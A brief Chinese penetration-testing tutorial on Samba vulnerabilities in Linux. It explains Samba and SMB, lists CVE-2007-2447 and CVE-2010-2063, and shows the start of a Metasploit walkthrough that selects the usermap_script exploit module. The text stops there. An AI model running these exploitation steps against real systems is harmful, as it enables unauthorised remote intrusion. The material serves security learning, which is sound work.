Linux系统服务渗透攻击-Samba安全漏洞
Samba安全漏洞
linux 环境下常用的 samba 服务低版本存在溢出攻击。
Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB 协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。
漏洞:
CVE-2007-2447,Samba 远程 Shell 命令注入执行漏洞。
CVE-2010-2063,Samba 报文链接远程内存破坏漏洞。
攻击复现
msf > search samba //查找针对samba服务漏洞的相关渗透攻击模块
msf > use multi/samba/usermap_script //调用特定的渗透攻击模块
msf exploit(usermap_script)